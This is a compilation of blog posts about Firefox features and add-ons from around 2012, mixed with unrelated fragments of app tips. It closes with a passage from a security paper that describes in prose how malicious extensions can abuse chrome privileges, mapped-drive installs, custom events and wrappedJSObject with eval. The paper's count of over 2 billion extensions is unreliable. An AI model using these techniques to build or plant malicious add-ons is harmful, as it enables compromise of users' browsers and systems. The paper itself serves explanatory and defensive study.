By now you must have heard about the silent update feature that Mozilla is currently working on for the Firefox web browser. I first covered silent updates back in October of 2010 when Mozilla started to announce plans to integrate a better updating mechanism into the browser. The basic idea behind the move was to improve the updating process for the user. As of now, updates are applied to the browser on start up, which may prevent Firefox users from using the browser when it gets started on the system. Vista and Windows 7 users furthermore may see UAC prompts when Firefox is updated, which need to be resolved as well before updates can be applied.
The silent update feature is made up of three core components, of which one is already integrated into the current stable version of the browser.
Default Add-on compatibility – This feature is already integrated in all versions of the browser from Firefox 10 onwards. It basically assumes that Firefox add-ons are compatible, even though their maximum version compatibility may state otherwise.Mozilla Maintenance Service – The second component is a service under Windows, that is working in a similar fashion as Google Updater. This service works around the UAC prompt, so that updates require no additional user action when they are applied. This feature is planned for Firefox 12 which Mozilla aims to release at the end of April 2012.Background Updates – This is the third and final component. Updates will be installed while the browser is running once the component is included into Firefox. This keeps the start up time at usual levels, as add-ons have already been installed while the browser was running. The feature will land in Firefox 13 or 14.
Firefox users who do not want the Mozilla Maintenance Service on their system can block it in the Firefox options. To do that, they need to do the following:
Click on Firefox > OptionsSwitch To Advanced > Update in the Options windowLocate Use a background service to install updates and uncheck the box.
It seems as if the service will be installed automatically. It is not really clear if this happens during an update, or only for new Firefox installations. If you select to uninstall it, it will not be installed again with future updates. If the service gets removed, Firefox will be updated as before.

Toolbar support in Firefox is limited to horizontal toolbars. You could argue that the sidebar available in the Firefox browser is more or less a vertical toolbar, but since it is not as customizable as other toolbars in the browser, I would not necessarily count it as that.
If you have ever tried a recent version of the Opera web browser, you know that it can display a toolbar on the left side of the web browser window that leads to popular browser features. This is called panels in Opera, and it takes a single click to display or hide the icons provided in the interface. Firefox users can now add a vertical toolbar to their browser as well, thanks to a new Firefox add-on.
Enter Vertical Toolbar, a Mozilla Firefox add-on that adds a toolbar to the left or right side of the browser. Vertical buttons in Firefox can be beneficial for widescreen users who usually have a lot of white space on either side of the Internet browser window, and especially so if their horizontal space is rather limited and they prefer not to display a horizontal toolbar in the browser.
When you install the extension in the browser you will immediately see the new Firefox toolbar attached to the left side of the browser window on restart. The developers have added six buttons to it by default which lead to the browser history, download manager, the bookmarks, and printing, fullscreen and reloading options.
Like any other toolbar in the browser, it can be customized with new icons that you can drag and drop onto it. Right-click on the toolbar and select customize from the context menu.
Additional icons have been added to the list of available ones by the Firefox add-on. This includes links to consoles, private browsing, the page source or page info, among other new toolbar buttons. A simple drag and drop moves any of the icons from the customize toolbar window to the vertical toolbar, and vice versa. You can also drag and drop other interface elements, for instance from Firefox’s status bar or navigational toolbar, to the new bar.
You can also select options from the right-click context menu to customize the Firefox add-on further.
Here you can select to place the toolbar on the right-side instead of the left, enable auto-hide or change the toolbar buttons display from icons only to text, or icons and text.
Vertical Toolbar can be a handy Firefox add-on for users who prefer to use a vertical bar in the browser.

The majority of web page to pdf extensions let you convert a single web page into a pdf document. This may often be all that’s needed, but it is not very practicable if you want to create a pdf document from multiple web pages. While you could now do some copying and pasting into Microsoft Office or Open Office, and use the programs to create the pdf document for you in the end, you’d probably be interested in a more straightforward option.
The Firefox add-on Print pages to Pdf could be a solution, provided that you are running Firefox on Windows or Linux. Linux support has just been added by the developer in the latest add-on version, and it currently is limited to 32-bit versions only. It is likely that this is going to change in the near future.
The extension has a whooping file size of more than 8 Megabytes under Windows, which is something that you should take into considerations, especially on computer’s that do not have a lot of RAM installed.
Once you have installed the extension and restarted the Firefox browser, you will notice that a new entry has been added to the right-click context menu in the browser.
Here you can select to print the active tabs, or all open tabs, to pdf. You also get the option to print the pages as they come, or only text. Keep in mind that all tabs of the active window will be printed to pdf in this case, and not all tabs in all windows. One option for researchers would be to bookmark all relevant pages into a single bookmark folder to print the whole folder in the end to a single pdf document. I’d suggest you open a new window before you start your research if you plan to print the open tabs to pdf using the extension.
You can also print bookmarks, for instance in the bookmarks’ folder to pdf. Just right-click a folder or selected bookmarks again and select one of the options displayed to you in the context menu.
Before you start converting websites or bookmarks to pdf, you may want to take a look at the extension options. Here you can make a lot of changes. The general tab allows you to change the output directory and menu appearance in the browser. If you have no intention of converting bookmarks to pdf, you can disable the context menu option here. The pdf document is automatically opened once it has been created, which you can block here as well.
The pdf global and webpage tabs can be used to change the output. The global tab displays options to change the output format to postscript from PDF, configure the output paperformat, units and margins, outlines, and to include a table of contents on the first page of the pdf. The table of contents is pretty interesting, as sub headings are for instance added to the contents as well automatically.
The webpage tab handles styling, header and footer layout preferences for all selected pages and bookmarks. From adding custom text or a header file over including or excluding external and local links, to the exclusion of backgrounds and graphics. It is all there and needs to be configured once for all printing activities. The default settings are working well, but customizing them provides you with more flexibility and cleaner looking print outs.
This extension works really well with several print-related add-ons, like Edit Page.

If you are a Firefox 3.6 user you know by now that support for that branch of the web browser will end on April 24, 2012. As it stands now, Firefox 3.6.28, released on March 14, is likely the last version of Firefox 3.6. Mozilla will not update the version of the browser again unless a major security or stability issue forces them to.
With Firefox 3.6 out of the picture, Firefox users still using the branch are asked by Mozilla to either update to the current stable version of the browser, which is Firefox 11 at the time of writing, or the Firefox Extended Support Release. The latter has been specifically designed for organizations as a way to lessen the impact of Mozilla’s new rapid release process on the company’s IT department.
What about Firefox users who do not want to upgrade their browser to a newer supported version? Asa Dotzler, product director for the Firefox desktop browser, suggests the following.

You may ask yourself why he is only referring to Windows 2000 users in the paragraph above. The reason for him doing so is that Mozilla decided to discontinue support for Windows 2000 starting with the release of Firefox 13 in June 2012.
We’d also like to take this opportunity to announce that our minimum supported Windows version will change from Windows 2000 to Windows XP SP2 in Firefox 13. We never change minimum requirements lightly, but this support change allows us to significantly improve Firefox performance on Windows by using a more modern build system. Windows XP users are advised to update to the latest service pack, and Windows 2000 users should consider upgrading ahead of the June release of Firefox 13.
What he does not take into account is users who do not want to switch to newer versions of the browser despite the fact that they could.
The majority of users sticking with Firefox 3 at the moment are likely not satisfied with the development of the browser, and not limited by their systems.
It is interesting that Asa Dotzler recommends Opera. Many users would have probably guessed that Chrome was was a more likely candidate, but like Firefox will soon do, Chrome is not supporting any Windows operating system before Windows XP SP2. Users working with Windows XP and newer systems on the other hand can switch to Google Chrome instead, which the majority that do not upgrade the Firefox browser will probably do.
There you have it. If you are still running Firefox 3, you are asked to update the browser to a newer version, or switch to Opera. Which will it be for you?

You can configure the Firefox web browser to reload the last session on start up. That’s a custom setting that you need to configure under Firefox > Options, the General tab there and the selection of Show my windows and tabs from last time. When you do that, the browser opens all tabs that you had open when you quit the browser. On my computer, it seems to load the last open window more often than not, which can be attributed to the fact that you can only close one window at a time. If you’d kill the Firefox process, or have the browser restarted automatically, you’d probably end up with all windows being opened again as well.
It has happened in the past on my system, that Firefox would not load the session. The browser instead displayed the selected homepage instead with no sign of the tabs that were open in the last session
Firefox comes with options to restore the windows and tabs of a previous browsing session. You can access the listing under Firefox > History > Recently Closed Windows. Here you find the windows listed by the tab that was last active. When you click on one of the sessions, the whole window with all of its tabs gets restored.
Remember that those information are only displayed if you do not clear your browsing history on exit. If you have configured Firefox to do that, you won’t be able to restore sessions. This is handled by the browsing history setting. You can configure everything else to be deleted, and still be able to restore sessions in the browser. If you select to delete the browsing history, you cannot restore sessions. You will in fact notice right away that you are starting with a single page in the browser after you have enabled it.
You can however disable remember by browsing and download history on the main privacy options page without losing the functionality to restore sessions in the browser. Feels kinda strange though if you ask me.
If you have very important sessions that you cannot afford to lose no matter what, you may want to consider upping the ante by installing an extension like Session Manager which saves sessions independently. Handy to avoid total disaster if the built-in session restore is not working correctly, or if you want the browsing history to be deleted on exit.

Programs like Firefox, Thunderbird or the Windows operating system tend to become slower the longer you use them. This can be partially attributed to the way these programs save and delete data. In the case of Firefox and Thunderbird, SQLite databases are used to store data. These databases grow in size over time, which in turn reduces the loading time and thus the performance of the application.
Back in 2009 I reviewed several options to optimize the SQLite database files in Firefox to improve to speed up the web browser after some time of use. The same method worked with Thunderbird as well.
Speedyfox 2.0 is a standalone program for the Windows and Macintosh operating system that can be used to run those commands more conveniently. The portable program scans your operating system for compatible programs – which at the time of writing are Mozilla Firefox and Thunderbird, Google Chrome and Skype, and displays a selection menu afterwards.
Here you can select the programs and profiles that you want to optimize. You can use the SpeedyFox > Add Custom Profile menu to add custom profiles to the cleanup. This is useful for portable profiles that are not picked up automatically, or non-default profiles.
Once you have made your selection, you can click on the optimize button to run the database optimization on all selected profiles. The progress of the optimization is displayed in a log, followed by a summary in the end. It took less than ten seconds to optimize individual profiles. On a test system, I tried the optimization on Firefox and Thunderbird.
Firefox’s database was reduced to 5.59 MB from 13.5 MB, while Thunderbird’s to 131 MB from 144 MB.
The developers claim that the program can boost the startup of supported programs up to three times. While I was not able to confirm that, I cannot flat out deny it either. The effect was minimal on my system, but that may have something to do with the fast SSD that I have installed.
I’d recommend to create a backup of your profile or user directory before you run the program to be on the safe side. We have previously covered SpeedyFox here on Ghacks. Back then it was only compatible with the Firefox web browser. Support for additional programs has been added in this version which just has been released.

You have multiple options to copy a single word in the Firefox web browser and Thunderbird email client. You can move the mouse cursor to the word’s first letter, press and hold down the left mouse button, and move the mouse to the end of the word to highlight it. You could also use the keyboard shortcut for this once you have placed the cursor at the beginning or the end of the word that you want to copy (by using Shift left-arrow or Shift right-arrow). Or, you could double-click the word to copy it directly (a triple-click highlights the full line up to the next carriage return). While doing that, you may notice that the trailing space behind the word is always highlighted as well.
If you are double-clicking words to highlight and copy them afterwards, you probably have a hard time understanding why the trailing space is included in the highlighting. I personally have no idea why it is the case, but that it seems to be the default when you double-click words in most applications under Windows.
It is easy enough to fix with the Shift-left key, but still a nuisance especially if you highlight and copy words regularly. The Mozilla developers have added a preference to the browser and the email client that changes the behavior so that only the word, and not the word plus the trailing space are highlighted.
Firefox
Enter about:config in the Firefox address bar. First time users need to confirm that they will be cautious before they see the preferences listing. Filter for the term layout.word_select.eat_space_to_next_word and double-click it to set it to false.
Thunderbird
Click on Tools > Options, and in the Options window on Advanced > General. Locate the Config Editor button in the menu and click on it. Filter for the exact same term and double-click it to set it to false.
Both changes are automatically enabled once you set the parameter to false. I suggest you try it by double-clicking on a word on a website or in an email. To reverse the changes, repeat the exact same steps. The preferences should be set to true once you are finished.

Your best bet is probably going to be buying an industrial router and using the old one as a repeater, actually extending Ethernet cable to the barn, or getting cellular internet by tethering your phone or just using an independent device.

You should at least learn the basics so you understand how programming works and be informed when you're discussing plans with a developer you hire. Alternatively, if you are just afraid of learning Objective C or Java and want a framework to help, Corona uses a very simple language called Lua to create iOS and Android apps. Alternatively, Adobe Flash can create iOs and Android apps as well, but you're slightly limited by how much you can really do.

It pretty much works with whatever web browser you use, so if you want a better Facebook you should have no trouble using Social Fixer to get just that.

30:07 Zombies, Run! (iPhone) Dachis spent this week training for the inevitable zombie apocolypse with a game called Zombies, Run!. It throws you into a story where your helicopter crashes in the small village known as Abel Township. You're then required to run as fast as you can—literally—to escape the zombies that are after your brains. It works by tracking your GPS location as you run to judge distance and pace. You'll pick up items and earn achievements as you go. The farther you run, the farther you'll move along in the story. If fear motivates you, this app is a great way to get off your butt and exercise.

32:38 Sparrow (iPhone) Pash started using Sparrow for iPhone and found it to be everything you'd want from a mobile email client even though it can't send push notifications. Everyone agreed that push notifications aren't all that necessary, since you can just make the built-in Mail app offer notifications and then just view the message in Sparrow instead. On the other hand, sometimes it's nice to not be notified at all and just check your email when you want to check it. If you do want real push notifications in Sparrow, however, you can use this jailbreak tweak.

Mozilla plans to make a bunch of changes in the next two versions of the Firefox web browser, and users who are running either the beta or aurora version of the browser right now get a taste of those changes already.
One of the changes is a new home page. Firefox users should not confuse this page with the homepage that they can set freely in the web browser though. The home page is displayed to new users who install Firefox for the first time on the system, when you enter about:home in the browser’s address bar, or automatically when Firefox is configured to load that page on start up.
The new home page displays a Google search form prominently in the center. There does not seem to be an option to modify the search engine at this point in time, but it is likely that add-on developers will find a way to replace it.
Below the search is a link to the latest features of the browser which can be useful to find out what changed after an update.
The bottom toolbar links to often used features of the browser:

All of these options are accessible elsewhere as well, and it is likely that most advanced users won’t find a lot of use in the new home page of the browser. Inexperienced users on the other hand may find it more useful. Especially the option to restore a previous session comes in handy, when they have configured the browser to load the about:home page on new start and not the last session automatically.
What’s your impression of this new Firefox feature?
Browser plugins may soon become a dying form of adding functionality to web browsers. We are already seeing first signs of that, for instance with Chrome’s built-in pdf reader, or the drive towards HTML5 video and media in general. The biggest issue with plugins, besides compatibility, is security, and here the need to keep plugins up to date to avoid attacks that exploit known vulnerabilities that have already been fixed in the latest plugin versions.
While there have been some attempts to inform the user when plugins are not up to date, it is still nothing that prevents users from running outdated plugin versions on their computer.
Mozilla has now started to integrate a native PDF reader into Firefox 14 versions. We have talked about pdf.js before, a script that is rendering PDF with HTML5 and JavaScript. While it may not look that different from Google Chrome’s internal pdf reader, it is not the same thing.
Andreas Gal, one of the authors of pdf.js, highlighted some of the benefits in a blog post in 2011.
Displaying PDFs directly in the browser would definitely improve the user’s experience. There are literally millions (billions?) of PDFs floating around the web, and on many devices loading PDFs switches to a different application (e.g. Preview on OS X and PDF View on Android). Also, external PDF readers and many plugins don’t support important PDF features well, including content links and fetch-as-you-go (HTTP range requests).
The traditional approach to rendering PDFs in a browser is to use a native-code plugin, either Adobe’s own PDF Reader or other commercial renderers, or some open source alternative (e.g. poppler). From a security perspective, this enlarges the trusted code base, and because of that Google’s Chrome browser goes through quite some pain to sandbox the PDF renderer to avoid code injection attacks. An HTML5-based implementation is completely immune to this class of problems.
Firefox 14, which is currently available in the Nightly channel, includes the pdf reader already. It is listed in the extensions menu of the browser, and deactivated by default. Firefox users who’d like to test the reader capabilities need to enable it first, before they disable any plugins in the browser with pdf reading capabilities.
The pdf reader opens pdf documents in browse tab. A small toolbar at the top allows you to go to a specific page, change the zoom level, print the document, download it, or bookmark the current location. It is quality-wise not on pair with Adobe Reader’s plugin, but still ok and comparable to Google Chrome’s pdf reader.
Firefox users who would like to try the extension right now can install a stable or nightly version of it from the project site. And yes, it works in all recent versions of the Firefox browser. (via Sören Hentzschel)

If you are impatient, you may have tapped on the F5 key every few seconds to reload the page to see if anything has changed yet.
That’s fine and doable if you are waiting for one page to reload with the information you are looking for, but what if you are monitoring two auctions on eBay?
That’s where Auto Refresh for the Firefox web browser may help you out with. The free add-on allows you to refresh individual pages or groups of pages in select intervals.
A right-click on a page opens the context menu with the new Auto Refresh entry added to it. Here you can enable the automatic reloading of the current page, or all open tabs of the browser. You can select the reload interval here as well, ranging from every 2 seconds to once per hour. The interval can be randomized to make it look more natural.
The intervals can be edited in the add-on preferences to suite individual needs. You can furthermore switch from standard refresh to hard refresh. While not explained anywhere, it is likely that the latter bypasses the browser cache to request all information from the web server the page is hosted on again.
Auto Refresh adds an icon to the status bar which links to the add-on preferences and instructions on the developer website. This icon can be disabled in the preferences.
The Firefox extension can be quite useful for users who often encounter situations where they need to reload pages until information on these pages change. It can also be handy on news aggregators like Reddit or forums like 4Chan to keep up with new links and information posted on the sites.
Even though Mozilla would prefer users not to look at Firefox versions anymore, it is something that I like to keep track of to see what’s changing in the browser. It is easier to compare Firefox 12 to Firefox 13, than it is to compare Firefox released in February, with Firefox released in March. Why? Because you might end up comparing the same browser versions, and come up with zero changes or feature additions otherwise.
Firefox 13 is currently being prepared to be moved to the Aurora channel. If you remember the rapid release schedule, you know that it will stay in that channel for six weeks before it is moved to beta, where it stays another six weeks before it is released as a stable version. Firefox 13 therefor will be released in about 12 weeks from today on.
Firefox 13.0 will be one of the first versions of Firefox that’s bringing a lot of new features to the table ever since Mozilla switched to the rapid release process. It is definitely something to look forward to, and here is why.
The new version will introduce silent background updates which are designed to cut the time the updating process is visible to the user. Instead of having to wait seconds and sometimes even minutes for the update to be downloaded and installed, Firefox users beginning with version 13 are handled in the background invisible to the user. This is similar to how Google is handling Google Chrome updates.
But this is not the only major change in this version of the browser. Firefox 13.0 will also see an update to the reset Firefox feature which lets you fix the browser automatically by creating a new profile and migrating data to it. You can read more about Firefox Reset in the linked article. The current plan is to finalize the feature in Firefox 14. Mozilla aims to release the new hang reporter with Firefox 13, which is used to “collect, analyze, and fix browser hangs”.
You may also have heard that Firefox will ship with a new tab page and home tab. The new tab page mimics Opera’s Speed Dial feature. It displays nine popular websites with thumbnails and their page title. Firefox users can disable the feature to keep the blank tab page instead. The new home tab page opens when about:home is loaded in the browser.
Additional features inlcude incremental garbage collection which would improve browser performance, inline URL autocomplete, and the new tabs on demand feature for automatic session restores.
Firefox 13.0 may also get mandatory ASLR (Address Space Layout Randomization) on Windows for binary components, which improves the browser’s defense against attacks targeting the browser’s memory. Some third party extensions may stop working because of this and Mozilla will monitor the impact carefully on release.

Remember the HTMl5 video war from about a year ago? When browser manufacturers left and right claimed allegiance to H.264 or WebM? For the user, such moves can often be disastrous, anyone remembering the Blu-Ray vs. HD-DVD uncertainty knows what I’m talking about. With HTML5 video it came down to Microsoft and Apple supporting H.264, and Mozilla, Google and Opera supporting WebM. Google furthermore had support for H.264 built into the browser, but promised to remove support completely in the future.
The fronts appear to be crumbling right now, with Mozilla’s Andreas Gal proposing a change in strategy for the Firefox web browser. Originally aimed at the mobile version of the browser, it soon widened to include the desktop versions as well.
Firefox Mobile is in a predicament, as WebM support has not yet been included into the Android operating system. With Firefox only supporting WebM, it would effectively mean that Firefox users cannot play HTML5 videos, the new standard when it comes to video on the Internet. For now, Adobe Flash offers a fallback.
Gal’s idea to bake H.264 support into Firefox comes with an interesting twist. Instead of supporting H.264 natively, the developers plan to use the format if it is supported by the operating system. This could also pave the way for additional codecs being supported by the browser, mp3 comes to mind.
I want to land bug 714408 on mozilla-central as soon as I get review for it. It adds hardware-accelerated audio/video decoding support to Gecko using system decoders already present on the system. Android, for example, ships by default with a number of decoders, and in particular for such mobile devices we really have to use these hardware-accelerated decoders for good battery life (and performance).
Initially this will be enabled on Gonk (B2G). In a few weeks we will add support for Android as well. We will support decoding any video/audio format that is supported by existing decoders present on the system, including H.264 and MP3. There is really no justification to stop our users from using system decoders already on the device, so we will not filter any formats
On Android, H.264 would readily be available for the browser. As far as the desktop goes, things are more complicated. If you look at Windows, you will notice that Windows 7 ships with H.264 support, while Vista and XP do not. Microsoft recently created a Firefox add-on that added H.264 for Windows 7 users of the browser.
Concerns were raised by some developers that Mozilla was capitulating on free codecs, but most seem to agree that Mozilla needs to do something to stay competitive.
I do believe this war is lost. Just look around. Almost none of the content users want to watch is available in WebM. The only reason desktop is usable is because of Flash, a proprietary plugin, playing video for us (in H.264, mostly). Even Google, supposedly a proponent of open codecs, never fully converted YouTube and never dropped H.264 from Chrome. Taking a principled (I would at this point prefer ‘stubborn’ I think) stance on H.264 won’t change reality. It just hurts us and our users.
Firefox got to the point where we are on desktop today by embracing reality. In the early days we started supporting IE-isms like document.all that were god awfully ugly and non-standard. But it was needed for compatibility so we can give people a usable web experience. The web uses H.264. That’s an unpleasant fact, but its a fact. We have to support it whether we like it or not, so we can be around for the next round and continue to influence the web for the better.
Nothing seems to be set into stone yet, but it appears as if Mozilla intents to go forward with the implementation in the near future. Would you personally have a issue with Firefox supporting codecs such as h.264?
Tranquility is definitely not the first add-on or bookmarklet that is improving the readability of websites in the Firefox web browser. We have covered quite a few apps that can do that for you, from Readable over Tidyread to the recently released Evernote Cleary extension. All tools work considerably well in the browser. They have in common that they turn a common web page into a compressed page that is displaying the article or post on the page, and barely any other page element. This improves the readability of the article, as you cannot be distracted anymore by ads, banners or sidebar elements, and because you often get better typography as well.
Tranquility for Firefox is a new add-on for the browser that improves the readability of web pages in a similar fashion as the apps mentioned in the first paragraph. Firefox users who install the extension have several options to trigger the functionality. They can click on the add-on’s navigation-bar icon, use the keyboard shortcut Ctrl-Alt-T, right-click on links and choose the Tranquility option, or enable a Pause/Break button that acts as a single key shortcut.

As you can see, there is a big difference between the two screenshots. There is also a more links button on the right side of the screen that can display additional links found on a particular page. This can be useful if the site display related links in the sidebar for instance.
You can open the preferences of the extension to change fonts and font sizes, turn off the background image, and select individual background and font colors.
Here it is furthermore possible to change the reading width, useful if you are on a widescreen monitor or small resolution monitor.
So called Tranquil Browsing Mode is enabled by default, which means that any link opened in Tranquility view will also be opened in that view mode. The developer states that Tranquility works fine with the NoScript extension, which other add-ons that offer a similar functionality are not.
Extensions like Tranquility are not only useful if you prefer to read on the web without noise around the text, but also in case you want to print an article on your printer.
Windows/Mac/Linux: The latest version of Firefox is available for download, and with it comes the ability to synchronize your extensions across desktops and operating systems with add-on sync (after an eternity of waiting). Firefox 11 is in line with Mozilla's new Chrome-like rapid-release schedule, and aside from a few new developer tools, add-on sync is the only major new feature available in the new version.
Once enabled, Firefox Sync will also give you the option to ensure your add-ons are available on all of your computers. In addition to add-on sync, the new version marks most add-ons compatible by default, regardless of the extension's version number—which means you don't need to rely on things like the Add-On Compatibility Reporter anymore. Developers get access to a few new tools as well in Firefox 11, including "Tilt," a 3D page inspector, and an on-the-fly CSS editor that will allow you to edit stylesheets directly in-browser.

Firefox users who cannot wait to update the stable channel of the web browser from version 10 to 11, can download the new version from the official Mozilla ftp server or third party download sites early. Please note that while it is unlikely that the final version will get replaced in last minute, it has happened in the past. It is recommended to wait for the official release announcement if Firefox is running in a productive environment, or if you do not need to have access to the new feature set introduced in the browser right away.
It will take approximately three days before the internal updater picks up the new version and offers to upgrade the browser automatically. You can check for the installed version with a click on Firefox > Help > About Firefox.
The beta release notes highlight the changes that Mozilla has implemented in the new version of the browser. Probably the biggest feature for end-users is support for add-on synchronization as part of Firefox Sync. This feature can be used to synchronize installed browser add-ons between all versions of the browser where sync is enabled on.
Firefox users who are using Google Chrome as well on the system can now migrate their bookmarks, history and cookies from the browser as part of the migration process.
The majority of features are only interesting for web developers and developers in general. Firefox 11 supports the CSS text-size-adjust property, and the outerHTML property. Developers can furthermore make use of the Style Editor for editing CSS, and the new Page Inspector 3D View which is available if the computer is compatible with WebGL.
Firefox 11 furthermore supports the SPDY protocol for faster page loads, and XMLHttpRequest HTML parsing.
The change log lists unresolved issues, among them some that have been noticed by some users in previous versions of the browser as well. This includes the slow scrolling in the Gmail window, or jerky scrolling and text input under certain conditions.
It is not really necessary to update the browser right now, instead of waiting the three days before the official announcement is being made. It would be different if stability or security updates were included in the release.
Update: Mozilla is preparing to replace the current version with an update. It is not advised to download the release version just yet.
If you have followed the development progress of Microsoft’s upcoming operating system Windows 8 closely, you may know that it ships with two different versions of the Internet Explorer browser. First a standard desktop version of Internet Explorer 10, and then a second version for the new Metro user interface part of the operating system.
This opens up a new predicament for other browser developers as their browsers suddenly only work in one part of the operating system, and not the other. While it is possible to install browsers like Chrome, Firefox or Opera in Windows 8, they only work in the desktop environment and not the Metro UI part of the browser.
Mozilla were the first to announce that they would start to develop a Metro UI compatible version of the Firefox web browser to make the browser available in the Metro interface as well.
Development has begun on the new version, and the developers plan to release a proof of concept demo in the second quarter.
In order to deliver a compelling Firefox for Windows 8 Metro experience, we need to understand what’s possible. A technology proof of concept is the first step. This is not a Alpha or a Beta, but should demonstrate the feasibility of Firefox in Windows 8 Metro. (Timing here is dependent on when Microsoft releases their Windows 8 consumer preview and developer documentation.)
Mozilla developer Brian Bondy revealed additional information about the Metro version of the Firefox browser in a blog post. According to this post, Mozilla can build a Metro browser that is equally powerful as the desktop browser. One restriction seems a bit odd.
Unfortunately a browser can only participate in Metro mode if it is the default browser. So if Firefox is not the default browser on a system, you can’t use it in Metro mode. This is a decision made by Microsoft.
This basically means that Firefox can only be used in the Metro UI if it is the default system browser. It is also not clear at this point in time how the web browser will be distributed.
Mozilla’s move to develop a Metro UI version of Firefox makes sense in a number of ways, including usability and consistency. Firefox users who work with the browser on the desktop, may for instance prefer to access their browser bookmarks and information in the Metro version, instead of having to work with Microsoft’s Internet Explorer 10 there.
One of the things that has always annoyed me in regards to Firefox’s private browsing mode was the fact that the browser did close the active session before switching to that mode. And while Firefox offers to save the active session, that is the open tabs and other session related information, it is nowhere near as comfortable as a solution that would spawn a new private browsing window without affecting the active session.
Google Chrome and the Opera web browser handle the private browsing mode this way for instance. When you start the incognito mode in Chrome for instance, you will notice that it spawns in a new window without affecting the old regular browser window.
Private Browsing Windows for the Firefox web browser bypasses the restriction in Firefox. Since it is not possible to override the feature directly to open the private browsing mode in a new window, developer Sören Hentzschel came up with the next best possibility: Use a different Firefox profile to load the private browsing mode window. This way, it is possible to keep the original Firefox window and have the private browsing window appear in a new window at the same time.
The extension will automatically use a profile that is labelled as private. It will otherwise launch the built-in Firefox profile manager to provide the user with a selection menu (and an option to create a new profile if only one exists). This profile is then used to load the private browsing window in Firefox. The profile manager pops up every time, unless you change the name of a profile to private.
Private Browsing Windows adds an icon into Firefox’s add-on bar that triggers the extension’s functionality.
Users who try the extension need to keep in mind that they need to close the browser windows in the correct order, to avoid the loading of the wrong profile on the next start.
The extension can be useful for Firefox users who work in the private browsing mode from time to time, and wish that there was a way to keep the regular browser window open when they do.
This paper aims to detail some of the techniques and methods that exist to subvert a fully patched and functioning browser Firefox. This aims to provide insight to developers and end users on some methodologies which could be used by malicious users. We will understand some of the basic important components that make up the Mozilla platform and various attacks that can be targeted against it. Firefox is a trusted browsing platform used by millions across the globe. It is a platform that is used by experts and novices. One of the biggest advantages and reason for massive success of Mozilla is an extensible plug-in model which allows the developers add additional features to the Mozilla Firefox environment than what was perceived by the original writers. Our topic of discussion is focused around these extension modules and how a malicious
developer can use some of these powerful features to subvert a Firefox and the underlying systems. The Code of extension runs with the same privilege that the browser enjoys.
Let’s begin with a very brief idea of some of the important components that make a Firefox extension. * This is for ff3.6 and not yet tested with ff4.
Chrome Chrome is used to indicate a special trust zone within Firefox; Firefox extensions that run in this zone enjoy a whole lot of trust by the browser. Chrome resources are defined by use of a special URL scheme “chrome: //” Example: chrome://messenger/content/messenger.xul
XUL XUL (XML User Interface Language) is Mozilla's XML-based language that lets you build feature-rich cross platform applications that can run connected or disconnected from the Internet. XUL overlays are a way of extending the user interface and behavior. For example is the new menu item or a button on status bar.
XBL XBL (XML Binding Language) allows the definition of new XML nodes/elements or custom tags. Custom tags can inherit processing logic. The connection between the new tag and the processing logic is called a binding. The object logic can be written to take advantage of any of the services available to the platform, including all the XPCOM objects and other custom tags that possess their own bindings. XML content and XPCOM can be tied together via an XBL binding. The “tabbed navigation” in Firefox is an example of XBL.
XPCOM XPCOM is the lowest layer of the Mozilla platform architecture. XPCOM provides functionality and its extensions. XPCOM interfaces are used by the browser and extensions to provide multiple functionalities to the user. XPCOM components can be built in many programming languages some are C++, Python, and Java. XPconnect is the JavaScript interface to XPCOM objects. Extensions can create new components after installation.
Each one of these components can be used by malicious user for his gains.

Extensions Installation Firefox extension which is commonly known with an extension of “XPI” is nothing but a Zipped Archive. This means a user can use any unzip solution like “winzip” to effectively examine the contents of an extension.
Extensions can be downloaded from “https://addons.mozilla.org/en-US/firefox/”. There exists a peer review of extensions performed before Mozilla places the extension on its site. But the point of concern is that security testing is not of utmost importance for testers. The second issue that has surfaced is the possibility of extensions which are hosted at Mozilla but without code review.These are mostly experimental in nature. The sheer number of extensions is overwhelming.Today the number of extensions has crossed more than 2 billion and growing.
XPI file can be hosted on any website and can be downloaded and installed on the target system. Any malicious user with some social engineering experience can easily convince a user to use his XPI. The other aspect I would like to bring to notice is the fact that many organizations seem to offer extensions like a DLP solutions company offering an extension to scan outgoing data via Firefox extensions. The question then remains as to who performs analysis of these extensions.
The third method of installation is in the way Mozilla provides a method where a filename with id of the extension and the contents of the file stores the location were the extension files are stored this file has to be stored in the extensions folder of Mozilla which is typically in program-files folder or the Mozilla directory in the profiles directory. When Mozilla restarts it automatically installs the extension no questions asked.
A startling find that I made when working with Mozilla extensions is that the extension executable scripts could be stored on a remote machine in a share.
By default Mozilla does not allow files to be loaded from network but if it is a mapped drive then Mozilla treats it like a local disk and goes ahead and installs the extension. This functionality can be abused. Worst case scenario I could imagine is attacks by a malicious USB injecting a simple text file into a victim machine and the text file pointing to a malicious code on a remote zip drive. This same activity could be performed by a malicious Active directory administrator owing browser rights across the enterprise.
Though a code review is performed by Mozilla before getting the add-ons published on their site, some of the concerns that exist are

These were some of the sample malicious scripts that were scripted using basic and legal functions approved by Mozilla to produce some very malicious extensions. The malicious extensions are limited only to the imagination of a malicious creator.
Cross Context Switching (XCS) The attack (xcs) was first found by “pdp”. This was found against an extension called sage. XCS involves a concept of making malicious code moving from one realm to the other, like a code in the website being executed by the resident extension. A major harm caused by such an attack would be that a user could be compromised by just visiting the web location.
Attacking DOM & Event Handlers Event handlers implement the properties attributes and behavior of an element. When a DOM element is dragged and drooped it takes with it the attributes properties and behavior with it. This could be a maliciously used if an extension code trusted the code that was dropped by a malicious DOM element.
CreateEvent() could be used to send custom events which could also include the extensions itself. In this example we will create an extension which listens for customs events and does certain activity like loading a dynamic XUL.
This could be exploited by a malicious user by making the user go to a page controlled by him which has code create a custom event to send the location of the malicious XUL hosted by him.
The extension on receiving the event loads the Malicious XUL from an arbiter location and as the XUL file now runs as part of Chrome it is free to do any malicious activity like the ones discussed in the previous section “Malicious Extensions”
As of Firefox version 3.5 “loadoverlay ” function does not take “http” based Xul requests but does allow XUL from “Chrome:\\”. Though this fixes the problem of a malicious user loading malicious content from internet but the threat of loading malicious XUL from a Map Drive still exists.

Bypassing Wrappers Multiple wrappers exist within Mozilla framework that acts as firewalls segregating the code from different zones. A developer, for ease of use could bypass these firewalls thus compromising the Firefox eco-system to malicious XCS attacks.
We will create a Firefox extension that bypasses such a wrapper using the “wrappedJSObject” to access variables in the document Zone and use this content in the privileged chrome zone. The extension developer uses another potentially vulnerable function “eval()”. He grabs the content from document and runs it through eval() in the chrome zone which allow a malicious user to inject malicious JavaScript code that will be executed by the eval function. Code:-

